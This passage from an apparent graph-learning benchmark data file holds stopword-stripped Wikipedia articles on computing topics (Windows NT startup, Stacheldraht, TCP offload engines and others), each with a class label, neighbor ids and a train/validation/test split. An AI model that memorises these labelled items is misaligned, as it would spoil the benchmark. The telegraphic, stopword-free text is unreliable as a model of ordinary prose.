    "text": "Windows_NT_startup_process:windows nt startup process windows nt startup process process windows nt 4.0 windows 2000 windows xp windows server 2003 operating systems initialize windows vista later process changed significantly see windows vista startup process information changed windows nt installer works similarly regular windows nt install except runs cd-rom boot method work bios must compatible el torito specification iso 9660 file system install cd fully compatible standard although level 1 file names n't file version appended boot image emulation type 1 sector long 2048 bytes loaded segment 0x7c0 extracted iso image using file-extraction program 7-zip winzip iso image also hybridized like iso images linux distributions therefore contain master boot record mbr makes unable boot copying image block device pen drive installer also run ms-dos command prompt previous versions microsoft windows already installed upgraded run installer ms-dos based operating system windows 98 windows user must start system dos mode execute i386/winnt.exe cd-rom floppy disk containing ms-dos used start installer versions installer floppies also available sale windows vista onwards installer runs boot.wim contains bootable version windows pe windows pe 2.0 based windows vista kernel later windows pe versions based later windows versions regular cd-rom install bios executes post searches boot descriptor cd-rom boot descriptor points boot catalog file iso 9660 file system bios searches boot image compatible current architecture loads memory runs boot image analogous boot sector hard drive boot image loads setupldr.bin analogous ntldr fails reason message displayed saying ntldr found may misleading moreover ntldr cd never used loading phase installer process also assumes file versions unavailable starting boot loader boot image checks whether windows install system already present starts codice_1 install found disk mbr starts boot loader directly thus obviating need codice_1 codice_1 started displays string press key boot cd waits user input none detected seconds boots next device behavior essential booting second stage installer starts hard disk codice_4 codice_5 composed two binary files concatenated also found installation cd compressed cab files first file codice_6 flat binary file loads second file second file regular exe file portable executable format codice_4 second file codice_8 codice_5 second file codice_10 codice_8 codice_10 embedded file system drivers basic access fat ntfs iso 9660 differently regular *.sys drivers boot loader uses bios interrupts access boot disk also contain built-in ini parser cab decompressor installer starts running prints string setup inspecting computer hardware configuration ... codice_13 called system information stored memory displays blue screen vga text mode title windows setup white line bottom behaves status bar looks codice_14 parses file works key-value database like *.ini *.inf registry keys may either contain list files associated install location script line therefore database stores data code parsing blank lines ignored sections name merged file codice_15 also loaded resolve hardware quirks key-value syntax codice_16 section follows installer asks additional drivers need loaded loads text mode drivers loaded floppy disk hidden feature shows screen prompting user select computer type f5 pressed first message text mode drivers different pnp drivers loaded regardless hardware present loading phase installer displays messages screen current file loaded message setup loading files file description ... files loaded phase located sections ending codice_17 sections key gives driver name value gives file driver name looked section without codice_17 suffix find driver user-friendly name kernel also needs registry hive mounted load registry codice_19 also loaded file names files loaded boot loader hard-coded except drivers pnp devices identified bus driver address checked section codice_20 corresponding driver name given used step boot files loaded boot loader message setup starting windows displayed kernel starts like normal install starts drivers loads service codice_21 runs kernel mode starts gui still text mode drivers nt based bios interrupts used anymore user asked choose file system layout selected partition formatted necessary files txtsetup.sif copied system creates registry hives automatically restart system nt system start bootstrap section hiveinfs points files used fill hives default values fresh install section named codice_22 files reg files also ini files understood ini interpreter bundled installer disk formatter program statically linked codice_21 many freeware tools available internet customize txtsetup.sif creation unattended installs integrate drivers hotfixes process sometimes referred slipstreaming following command shows remastered cd created minimum set options linux assumes current directory cd mount point image created home directory file codice_24 used make install unattended required present model file cd named codice_25 setup tries detect winnt.sif codice_26 directory root directory floppy disk windows nt startup process starts computer finds windows boot loader portion windows operating system responsible finding microsoft windows starting prior windows vista however boot loader ntldr microsoft also released operating systems intel itanium processors use ia-64 architecture boot loader editions windows ia64ldr.efi later referred simply ia64ldr extensible firmware interface efi program boot loader executed searches windows operating system windows boot manager reading boot configuration data bcd complex firmware-independent database boot-time configuration data predecessor codice_5 reading simpler codice_28 boot.ini file missing boot loader attempt locate information standard installation directory windows nt 2000 machines attempt boot codice_29 windows xp 2003 machines boot codice_30 databases may contain list installed microsoft operating systems may loaded local hard disk drive remote computer local network ntldr supports operating systems installed disks whose file system ntfs fat file systems cdfs iso 9660 udfs windows boot manager also supports operating systems installed inside vhd file stored ntfs disk drive windows 2000 later versions windows hibernation supported windows boot loader starts search operating systems searching hiberfil.sys ntldr looks root folder default volume specified boot.ini windows boot manager looks location hiberfil.sys bcd file found active memory set found boot loader loads contents file compressed version physical memory dump machine memory restores computer state prior hibernation next boot loader looks list installed operating system entries one operating system installed boot loader shows boot menu allow user select operating system non nt-based operating system windows 98 selected specified ms-dos style path e.g c boot loader loads associated boot sector file listed boot.ini bcd default bootsect.dos file name specified passes execution control otherwise boot process continues operating system starts certain basic drivers flagged boot loaded memory appropriate file system driver partition type ntfs fat fat32 windows installation resides amongst point boot process boot loader clears screen displays textual progress bar often seen due initialization speed windows 2000 also displays text starting windows ... underneath user presses f8 phase advanced boot menu displayed containing various special boot modes including safe mode last known good configuration debugging enabled case server editions directory services restore mode boot mode selected f8 never pressed booting continues following files loaded sequentially next ntdetect.com windows nt kernel ntoskrnl.exe hardware abstraction layer hal.dll loaded memory multiple hardware configurations defined windows registry user prompted point choose one kernel memory boot-time device drivers loaded yet initialized required information along information detected hardware windows services stored codice_31 portion registry set registry keys collectively called control set multiple control sets typically two kept event settings contained currently-used one prohibit system booting codice_31 contains control sets labeled codice_33 codice_34 etc. well codice_35 regular operation windows uses codice_35 read write information codice_35 reference one control sets stored registry windows picks real control set used based values set codice_38 registry key control set chosen codice_44 key gets set accordingly codice_40 key also set codice_44 end boot process codice_42 also set codice_44 boot process completes successfully services started order group started provided following keys purposes booting driver may one following finished control passed boot loader kernel initialization kernel subsystem windows executive subsystems done two phases first phase basic internal memory structures created cpu interrupt controller initialized memory manager initialized creating areas file system cache paged non-paged pools memory object manager initial security token assignment first process system process manager system idle process well system process created point second phase involves initializing device drivers identified ntldr system drivers process loading device drivers progress bar visible bottom display windows 2000 systems windows xp windows server 2003 replaced animated bar represent actual progress prior windows xp part boot process took significantly longer drivers would initialized one time windows xp server 2003 drivers initialized asynchronously boot system drivers loaded kernel system thread starts session manager subsystem codice_51 files opened autochk started smss.exe autochk mounts drives checks one time see whether cleanly unmounted autochk determines one volumes dirty automatically run chkdsk provides user short window abort repair process pressing key within 10 seconds introduced windows nt 4.0 service pack 4 earlier versions would allow user abort chkdsk since windows 2000 xp 2003 show text screen point unlike nt 3.1 4.0 displayed blue text screen user see different background picture holding mini-text-screen center screen show progress chkdsk boot time session manager subsystem session manager stores configuration codice_58 exact operation items based configuration set registry winlogon starts local security authority subsystem service lsass service control manager scm turn start windows services set auto-start also responsible responding secure attention sequence sas loading user profile logon optionally locking computer screensaver running login process follows user trying log local host codice_70 key used database user trying log another host netlogon service used carry data windows xp gina shown user presses secure attention sequence winlogon support plugins get loaded notified specific events lsass also supports plugins security packages rootkits bundle winlogon plugins loaded user logs keys allow multiple comma-separated values supplied allow malicious program executed time legit system file hashing algorithms stored sam database known broken winlogon responsibilities login process changed significantly windows vista userinit first program runs user credentials responsible start programs compose user shell environment shell program typically codice_71 started registry entry codice_72 pointed registry entry key codice_73 default value codice_74 evaluates codice_75 userinit runs startup programs following locations successfully boot client must support pxe booting windows deployment services wds component must installed server installed default wds successor remote installation services ris pxe program found bios rom chip network card pxe booting technology specific windows also used start linux system fact linux system act server service dhcp tftp pxe used start windows setup install system client computer run operating system ram latter called remote boot introduced windows xp embedded sp1 available flavor windows general process methods follows boot information negotiation layer binl windows 2000 service running server communicates client nbp already loaded pxe",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      3109,
      7207,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      7290,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      9902,
      3250,
      5300,
      9910,
      7351,
      10428,
      2749,
      5312,
      2244,
      8391,
      200,
      9420,
      5840,
      2782,
      9953,
      5858,
      8418,
      4836,
      9442,
      4326,
      2279,
      10473,
      1770,
      3308,
      10993,
      9972,
      3834,
      2811,
      1791,
      8959,
      11519,
      3856,
      8976,
      11539,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      823,
      10039,
      6972,
      3394,
      4423,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      5500,
      2943,
      1418,
      5003,
      5004,
      8080,
      10130,
      11677,
      929,
      11683,
      6570,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      9166,
      3535,
      8659,
      1498,
      5594,
      5596,
      478,
      7134,
      6114,
      6115,
      4074,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 10840,
    "label": 3,
    "text": "Macintosh_Quadra_660AV:macintosh quadra 660av macintosh quadra 660av originally called macintosh centris 660av personal computer designed manufactured sold apple computer inc. july 1993 september 1994 introduced alongside quadra 840av av model numbers signifies video input output capabilities enhanced audio 660av discontinued months introduction power macintosh 6100/60av apple also sold power macintosh upgrade card upgraded 660av match 6100/60av specifications users ready move powerpc quadra 630 also suitable replacement 660av uses pizza box form factor earlier centris 610 660av full motorola 68040 instead 610 fpu-less 68lc040 like 840av 660av features video input/output capability onboard 3210 digital signal processor clocked 55 mhz make video handling less burden cpu 660av also first macintosh include geoport optional geoport telecom adapter enables fax modem capabilities earliest centris 660avs older auto-inject floppy drive opening similar 610 centris models quadra models drive similar power macintosh 6100 lacking ‘ auto-inject ’ feature models deep round indent center floppy drive slot make possible insert disk way quadra av macs introduced new universal rom codenamed supermario would later used powerpc systems includes scsi manager 4.3 sound manager 3.0 also vectorized making easier patch introduced july 29 1993 introduced october 1 1993",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      3167,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      7305,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      1461,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10841,
    "label": 9,
    "text": "McCLIM:mcclim mcclim free software implementation common lisp interface manager project named mike mcdonald person started",
    "neighbors": [
      10752,
      11269,
      2062,
      9231,
      9749,
      8728,
      4633,
      9245,
      8226,
      2603,
      5165,
      5677,
      3631,
      2105,
      6717,
      576,
      8771,
      1613,
      9299,
      3675,
      2658,
      7267,
      8293,
      2666,
      5743,
      8303,
      2673,
      8304,
      5751,
      9848,
      5754,
      7292,
      7805,
      1664,
      1666,
      6797,
      9875,
      9877,
      3734,
      4777,
      5803,
      2225,
      11442,
      692,
      7867,
      4799,
      7880,
      8908,
      205,
      4822,
      9943,
      9434,
      10463,
      7392,
      7904,
      11488,
      10470,
      5360,
      5361,
      10480,
      8435,
      6906,
      3334,
      6919,
      9491,
      1812,
      1301,
      10012,
      3869,
      2335,
      3876,
      11559,
      10547,
      311,
      1347,
      1348,
      8524,
      10083,
      6502,
      8554,
      5492,
      3446,
      4992,
      3462,
      8582,
      7562,
      6556,
      10654,
      6047,
      4516,
      5031,
      9128,
      8618,
      5569,
      6594,
      8644,
      4550,
      7629,
      11218,
      10712,
      3034,
      479,
      3051,
      5612,
      11255,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10842,
    "label": 4,
    "text": "White_Ops:white ops white ops ad verification bot detection cybersecurity firm white ops cofounded chief scientist dan kaminsky 2012 white ops president michael tiffany ash kalb tamer hassan ceo company gene fay company ’ coo headquartered new york city international offices 2016 discovered methbot network bots six thousand online publishers platforms affected including facebook generating 3- 5 million fraudulent ad revenue per day 2017 white ops uncovered 3ve bot network one largest ad fraud enterprises yet discovered 1.7 infected computers leading thirteen department justice indictments 2018 investigation network google fbi originally operating prevent ad fraud online 2018 white ops expanded ad fraud activities include television detects bots bot networks uses human verification part process processes trillion transactions per month 2018 white ops produced reports ad fraud association national advertisers since 2014 2017 white ops began partnering trade desk block fraudulent impressions advertisers make bids following year 2018 whiteops began similar partnership beachfront media video management platform telaria white ops also partners adobe advertising cloud provide independent third-party bot detection 2019 white ops began partnering media.net",
    "neighbors": [
      11
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10843,
    "label": 2,
    "text": "Adaptive_replacement_cache:adaptive replacement cache adaptive replacement cache arc page replacement algorithm better performance lru least recently used accomplished keeping track frequently used recently used pages plus recent eviction history algorithm developed ibm almaden research center 2006 ibm granted patent adaptive replacement cache policy basic lru maintains ordered list cache directory resource entries cache sort order based time recent access new entries added top list bottom entry evicted cache hits move top pushing entries arc improves basic lru strategy splitting cache directory two lists t1 t2 recently frequently referenced entries turn extended ghost list b1 b2 attached bottom two lists ghost lists act scorecards keeping track history recently evicted cache entries algorithm uses ghost hits adapt recent change resource usage note ghost lists contain metadata keys entries resource data i.e entry evicted ghost list data discarded combined cache directory organised four lru lists t1 b1 together referred l1 combined history recent single references similarly l2 combination t2 b2 whole cache directory visualised single line inner brackets indicate actual cache although fixed size move freely across b1 b2 history l1 displayed right left starting top indicated marker indicates target size t1 may equal smaller larger actual size indicated entries re- entering cache t1 t2 cause move towards target marker free space exists cache marker also determines whether either t1 t2 evict entry arc currently deployed ibm ds6000/ds8000 storage controllers sun microsystems scalable file system zfs uses variant arc alternative traditional solaris filesystem page cache virtual memory modified allow locked pages currently use vacated postgresql used arc buffer manager brief time version 8.0.0 quickly replaced another algorithm citing concerns ibm patent arc vmware vsan formerly virtual san hyper-converged software-defined storage sds product developed vmware uses variant arc caching algorithm",
    "neighbors": [
      9665,
      6153,
      2250,
      8539,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 10844,
    "label": 5,
    "text": "Distributed_Universal_Number_Discovery:distributed universal number discovery distributed universal number discovery dundi voip routing protocol provides directory services asterisk systems dundi peered nodes share dialplan information protocol actually carry calls rather provides addressing information peers dundi cluster query peers telephone number call requested user result query dial string asterisk application dial protocol invented mark spencer author asterisk asterisk pbx systems use dundi peered cooperating system dundi nodes certain configuration access dundi instance least one node dundi configuration one limit number consecutive lookups peers setting ttl dundi peer advertise extensions context e.g connect local e.164 number advertise dundi configuration assigns priority weight advertised extension low values represent high priority must chosen first one answer received lookup asterisk cli one lookup hand test dundi configuration works dundi lookup tells pbx ask known peers know reach extension 301 priv network answer consists 6 parts order prevent network overloading time keep responses quick possible involved peers cache lookups see used keys may become invalid period lookup expiry date defaults one hour context given lookup dundi defaults e.164 context means looking normal international phone-numbers like 0031201234567 bogus number amsterdam netherlands order peer least one peer e164 trust group peers group bound digium gpa digium general peering agreement pdf",
    "neighbors": [
      11250,
      8627
    ],
    "mask": "None"
  },
  {
    "node_id": 10845,
    "label": 4,
    "text": "Layered_security:layered security layered security also known layered defense describes practice combining multiple mitigating security controls protect resources data like security methods layered security designed protect assets asset anything want protect include people property data etc layered security used environment military operations individuals community residents homeowners neighborhood watch groups etc words layered security practice using many different security controls different levels protect assets provides strength depth reduce effects threat goal create redundancies backups case security measures fail bypassed defeated placing assets innermost perimeter provide layers security measures increasing distances protected asset number layers security measures use depend threat importance asset term bears similarity defense depth term adopted military strategy involves multiple layers defense resist rapid penetration attacker yield rather exhaust too-rigid tactics incursion progresses resources consumed progress slowed halted turned back information assurance use term defense depth assumes merely technical security tools deployment also implies policy operations planning user training physical access security measures direct information assurance personnel involvement dealing attempts gain unauthorized access information resources within defense depth security strategy layered security regarded merely delaying tactic used buy time bring security resources bear deal malicious security cracker activities layered security example swiss cheese model cumulative act effect used risk analysis risk management model security systems likened multiple slices swiss cheese stacked side side risk threat becoming reality mitigated fact must pass holes defenses i.e trapped detected different defense defenses different kinds locations layered behind therefore theory lapses weaknesses one defense easily allow risk materialize since defenses also exist prevent single point weakness every category threat effective control deployed mitigate threat security vendors sometimes cite differing solutions grouped consumer enterprise categories ad hoc security strategy numerous vendors abundance different sometimes incompatible security solutions products leave gaps protection whereas vertically integrated vendor stack could provide comprehensive defense single-vendor solutions improve interoperability components complete security strategy may offer performance price benefits multi-vendor approach contrasting commercial security product argument best breed approach provides effective protection single vendor vertically integrated product stack may offering choice vendors want monopolize client customer business could also argued component comprehensive security strategy evaluated performance within niche open compatibility non-integrated components whole",
    "neighbors": [
      2948,
      8998,
      8838,
      7979,
      5082
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10846,
    "label": 4,
    "text": "Collateral_circulation:collateral circulation collateral circulation alternate circulation around blocked artery vein via another path nearby minor vessels may occur via preexisting vascular redundancy analogous engineered redundancy circle willis brain may occur via new branches formed adjacent blood vessels neovascularization eye retinal embolism formation may provoked pathological conditions high vascular resistance ischaemia example usefulness collateral circulation systemic thromboembolism cats thrombotic embolus lodges external iliac artery common iliac artery blocking external internal iliac arteries effectively shutting blood supply hind leg even though main vessels leg blocked enough blood get tissues leg via collateral circulation keep alive blood flow brain humans animals maintained via network collateral arteries anastomose join circle willis lies base brain circle willis so-called communicating arteries exist front anterior back posterior parts circle willis well left right side circle willis another example humans animals acute myocardial infarction heart attack collateral circulation heart tissue sometimes bypass blockage main artery supply enough oxygenated blood enable cardiac tissue survive recover central retinal vein occlusion neovascularization may restore blood flow retina new vessels bulk also presents risk causing acute glaucoma blocking drainage aqueous humour hepatic cirrhosis arising congestion hepatic portal vein may give rise collateral circulation branches portal caval veins liver two caval veins consequences newly established venous collaterals arising portal hypertension include esophageal varices hemorrhoids portocaval collateral circulation",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 10847,
    "label": 0,
    "text": "Document_structuring:document structuring document structuring subtask natural language generation involves deciding order grouping example paragraphs sentences generated text closely related content determination nlg task assume four sentences want include generated text 24 4 orderings messages including orderings better others example texts shown human readers prefer 1234 2314 4321 ordering also many ways sentences grouped paragraphs higher-level structures sections example 8 2**3 ways sentences 1234 grouped paragraphs including ordering human readers prefer groupings others example 12 34 preferred 1 23 4 document structuring task choose ordering grouping sentences results coherent well-organised text reader perspective three basic approaches document structuring schemas corpus-based heuristic schemas templates explicitly specify sentence ordering grouping document well content determination information typically constructed manually analysing corpus human-written texts target genre extracting document template texts schemas work well practice texts short 5 sentences less and/or standardised structure problems generating texts longer fixed structure corpus-based structuring techniques use statistical corpus analysis techniques automatically build ordering and/or grouping models techniques common automatic summarisation computer program automatically generates summary textual document principle could applied text generated non-linguistic data work infancy part challenge texts generated natural language generation systems generally expected fairly high quality always case texts generated automatic summarisation systems final approach heuristic-based structuring algorithms perform structuring task based heuristic rules come theories rhetoric psycholinguistic models and/or combination intuition feedback pilot experiments potential users heuristic-based structuring appealing intellectually difficult get work well practice part heuristics often depend semantic information sentences relate always available hand heuristic rules focus best text readers whereas approaches focus imitating authors many human-authored texts well structured perhaps ultimate document structuring challenge generate good narrative—in words text starts setting scene giving introduction/overview describes set events clear fashion readers easily see individual events related link together concludes summary/ending note narrative sense applies factual texts well stories current nlg systems good job generating narratives major source user criticism generating good narratives challenge aspects nlg fundamental challenge probably document structuring",
    "neighbors": [
      2440,
      7599,
      5197,
      3663
    ],
    "mask": "Test"
  },
  {
    "node_id": 10848,
    "label": 9,
    "text": "SHAZAM_(software):shazam software shazam comprehensive econometrics statistics package estimating testing simulating forecasting many types econometrics statistical models shazam originally created 1977 kenneth white shazam version 11 available windows platforms server workstation desktop windows xp later shazam editions read write fixed free format text formats using read format statements data stored observation row variable column without variable names supplied windows environment formats comma-separated values csv microsoft excel xls xlsx may also read written shazam professional edition contains comprehensive data import capabilities data connector sql editor allowing import machine data source tab space comma separated text formats file-based proprietary binary formats including various microsoft excel formats well microsoft access lan wan internet data source user driver system addition shazam import data database management systems dbms shazam ships drivers common data database management systems shazam extensible development shazam procedures included reused shazam command files numerous shazam procedures written available shazam website many sites throughout internet shazam currently available four editions shazam command line edition shazamd shazamq text user interface versions allow batch processing operate double quad precisions shazam standard edition shazamw adds native windows application incorporates multiple document interface mdi interface including command data matrix graph editors workspace viewer along integrated online help samples examples shazam professional edition shazamp adds menu wizard driven facilities executing shazam techniques data connector sql editor well integrated debugger main guide available using shazam offers detailed descriptions shazam features commands options well providing guidance statistical techniques performed algorithms used construction shazam techniques contains numerous theoretical explanations practical examples sample code",
    "neighbors": [
      5129,
      7945,
      3980,
      2317,
      6797,
      7950,
      2457,
      7580,
      7326,
      7983,
      6962,
      6718,
      5830,
      5703,
      4808,
      5833,
      5450,
      8262,
      2000,
      9944,
      2652,
      7523,
      4840,
      6248,
      363,
      5612,
      7924,
      3573
    ],
    "mask": "Train"
  },
  {
    "node_id": 10849,
    "label": 1,
    "text": "Result_set:result set sql result set set rows database well metadata query column names types sizes column depending database system number rows result set may may known usually number known front result set built on-the-fly result set effectively table codice_1 clause used query impose certain sort condition rows without clause guarantee whatsoever order rows returned",
    "neighbors": [
      9634,
      9286,
      11339,
      2669,
      10413,
      10737,
      8979,
      9075,
      2901,
      5403
    ],
    "mask": "Test"
  },
  {
    "node_id": 10850,
    "label": 6,
    "text": "E4M:e4m encryption masses e4m free disk encryption software windows nt windows 9x families operating systems e4m longer maintained author paul le roux joined shaun hollingworth author scramdisk produce commercial encryption product drivecrypt security company securstar popular source-available freeware program truecrypt based e4m source code however truecrypt uses different container format e4m makes impossible use one programs access encrypted volume created shortly truecrypt version 1.0 released february 2004 truecrypt team reported receiving emails wilfried hafner manager securstar claiming paul le roux stolen source code e4m securstar employee according truecrypt team emails stated le roux illegally distributed e4m authored illegal license permitting anyone base derivative work e4m distribute freely hefner alleges le roux right claiming versions e4m always belonged securstar time led truecrypt team stop developing distributing truecrypt",
    "neighbors": [
      8640,
      9281,
      2050,
      7139,
      10631,
      1801,
      4746,
      8331,
      7983,
      8976,
      7794,
      3572,
      5749,
      3382,
      3350,
      8283
    ],
    "mask": "None"
  },
  {
    "node_id": 10851,
    "label": 2,
    "text": "Comparison_of_open-source_operating_systems:comparison open-source operating systems tables compare free software open-source operating systems versions support feature first version supports listed",
    "neighbors": [
      2051,
      10255,
      3603,
      7187,
      8725,
      2073,
      4636,
      9245,
      5663,
      546,
      9762,
      3114,
      3629,
      5677,
      7223,
      10809,
      4669,
      6718,
      10813,
      7234,
      8772,
      3142,
      3654,
      5703,
      8262,
      1101,
      10317,
      593,
      1618,
      4192,
      11363,
      10341,
      9320,
      1646,
      8816,
      5747,
      9333,
      6263,
      9335,
      4734,
      1150,
      9343,
      7810,
      2179,
      132,
      6276,
      6797,
      4238,
      2193,
      2194,
      2197,
      9366,
      2199,
      11418,
      3229,
      2212,
      6311,
      4777,
      682,
      5293,
      2224,
      692,
      2228,
      10933,
      2236,
      5822,
      6338,
      9931,
      8909,
      5335,
      7383,
      10971,
      3296,
      9953,
      7907,
      4841,
      6890,
      7913,
      5356,
      237,
      9964,
      3312,
      8432,
      3826,
      8944,
      246,
      8439,
      5369,
      1273,
      3834,
      6910,
      5380,
      11012,
      1291,
      5389,
      10000,
      1298,
      5397,
      6422,
      7445,
      1304,
      1820,
      799,
      292,
      3876,
      5413,
      295,
      7980,
      9004,
      7983,
      2864,
      6963,
      823,
      7483,
      318,
      11603,
      11604,
      11606,
      2397,
      5470,
      10088,
      8554,
      8048,
      5492,
      2421,
      11638,
      1399,
      3969,
      8066,
      8582,
      3975,
      10631,
      7561,
      394,
      4493,
      7057,
      916,
      5531,
      7070,
      3487,
      4011,
      428,
      6062,
      11184,
      8114,
      2996,
      1462,
      9151,
      10687,
      8644,
      7626,
      6607,
      8147,
      3030,
      3035,
      477,
      6622,
      7134,
      6625,
      1513,
      8177,
      5106,
      499,
      2550,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10852,
    "label": 4,
    "text": "Stacheldraht:stacheldraht stacheldraht german barbed wire malware written mixter linux solaris systems acts distributed denial-of-service ddos agent tool detects automatically enables source address forgery stacheldraht uses number different denial-of-service dos attacks including user datagram protocol udp flood internet control message protocol icmp flood transmission control protocol tcp syn flood smurf attack combines features trinoo tribe flood network tfn adds encryption",
    "neighbors": [
      2060,
      4495,
      4883,
      11413,
      5402,
      10924,
      1965,
      7983,
      823,
      2754,
      9282,
      6347,
      4558,
      2007,
      11351,
      7515,
      2018,
      2409,
      2299,
      2045,
      9727
    ],
    "mask": "None"
  },
  {
    "node_id": 10853,
    "label": 5,
    "text": "TCP_offload_engine:tcp offload engine tcp offload engine toe technology used network interface cards nic offload processing entire tcp/ip stack network controller primarily used high-speed network interfaces gigabit ethernet 10 gigabit ethernet processing overhead network stack becomes significant term toe often used refer nic although circuit board engineers may use refer integrated circuit included card processes transmission control protocol tcp headers toes often suggested way reduce overhead associated internet protocol ip storage protocols iscsi network file system nfs originally tcp designed unreliable low speed networks early dial-up modems growth internet terms backbone transmission speeds using optical carrier gigabit ethernet 10 gigabit ethernet links faster reliable access mechanisms dsl cable modems frequently used data centers desktop pc environments speeds 1 gigabit per second tcp software implementations host systems require extensive computing power early 2000s full duplex gigabit tcp communication could consume 80 2.4 ghz pentium 4 processor see freed-up cpu cycles resulting small processing resources left applications run system tcp connection-oriented protocol adds complexity processing overhead aspects include moving functions dedicated hardware tcp offload engine frees system main cpu tasks 2012 consumer network interface cards support toe instead replacing tcp stack toe entirely alternative techniques offload operations co-operation operating system tcp stack tcp checksum offload large segment offload supported majority today ethernet nics newer techniques like large receive offload tcp acknowledgment offload already implemented high-end ethernet hardware effective even implemented purely software generally accepted rule thumb 1 hertz cpu processing required send receive 1 bit/s tcp/ip example 5 gbit/s 625 mb/s network traffic requires 5 ghz cpu processing implies 2 entire cores 2.5 ghz multi-core processor required handle tcp/ip processing associated 5 gbit/s tcp/ip traffic since ethernet 10ge example bidirectional possible send receive 10 gbit/s aggregate throughput 20 gbit/s using 1 hz/ bit/s rule equates eight 2.5 ghz cores many cpu cycles used tcp/ip processing freed-up tcp/ip offload may used cpu usually server cpu perform tasks file system processing file server indexing backup media server words server tcp/ip offload server work server without tcp/ip offload nics addition protocol overhead toe address also address architectural issues affect large percentage host based server pc endpoints many older end point hosts pci bus based provides standard interface addition certain peripherals network interfaces servers pcs pci inefficient transferring small bursts data main memory across pci bus network interface ics efficiency improves data burst size increases within tcp protocol large number small packets created e.g acknowledgements typically generated host cpu transmitted across pci bus network physical interface impacts host computer io throughput toe solution located network interface located side pci bus cpu host address i/o efficiency issue data sent across tcp connection sent toe cpu across pci bus using large data burst sizes none smaller tcp packets traverse pci bus one first patents technology udp offload issued auspex systems early 1990 auspex founder larry boucher number auspex engineers went found alacritech 1997 idea extending concept network stack offload tcp implementing custom silicon introduced first parallel-stack full offload network card early 1999 company ’ slic session layer interface card predecessor current toe offerings alacritech holds number patents area tcp/ip offload 2002 emergence tcp-based storage iscsi spurred interest said least dozen newcomers founded toward end dot-com bubble chasing opportunity merchant semiconductor accelerators storage protocols applications vying half dozen entrenched vendors in-house asic designs 2005 microsoft licensed alacritech patent base along alacritech created partial tcp offload architecture become known tcp chimney offload tcp chimney offload centers alacritech communication block passing patent time broadcom also obtained license build tcp chimney offload chips parallel-stack full offload gets name concept two parallel tcp/ip stacks first main host stack included host os second parallel stack connected application layer transport layer tcp using vampire tap vampire tap intercepts tcp connection requests applications responsible tcp connection management well tcp data transfer many criticisms following section relate type tcp offload hba host bus adapter full offload found iscsi host adapters present disk controllers host system connecting via tcp/ip iscsi storage device type tcp offload offloads tcp/ip processing also offloads iscsi initiator function hba appears host disk controller used iscsi devices appropriate general tcp/ip offload tcp chimney offload addresses major security criticism parallel-stack full offload partial offload main system stack controls connections host connection established local host usually server foreign host usually client connection state passed tcp offload engine heavy lifting data transmit receive handled offload device almost tcp offload engines use type tcp/ip hardware implementation perform data transfer without host cpu intervention connection closed connection state returned offload engine main system stack maintaining control tcp connections allows main system stack implement control connection security unlike kernels linux kernel include support toe hardware patches hardware manufacturers chelsio qlogic add support linux kernel developers opposed technology several reasons including much current work toe technology manufacturers 10 gigabit ethernet interface cards broadcom chelsio communications emulex mellanox technologies qlogic",
    "neighbors": [
      5472,
      1121,
      2723,
      7863,
      10924,
      112,
      10675,
      343,
      5531,
      11487
    ],
    "mask": "None"
  },
  {
    "node_id": 10854,
    "label": 7,
    "text": "PaizaCloud_Cloud_IDE:paizacloud cloud ide paizacloud cloud ide cloud ide online integrated development environment supports programming languages including c c++ php ruby perl python javascript node.js go enables developers get started coding immediately browser-based development environment written almost entirely javascript uses node.js back-end editor component uses ace dec 2017 uses docker containers workspaces gino inc. company actively maintains paizacloud cloud ide company offices tokyo",
    "neighbors": [
      8068,
      3462,
      8582,
      1435,
      9245,
      6176,
      5031,
      4777,
      5677,
      10413,
      5048,
      6074,
      8644,
      8262,
      2910,
      479,
      8554,
      2936,
      3705,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10855,
    "label": 3,
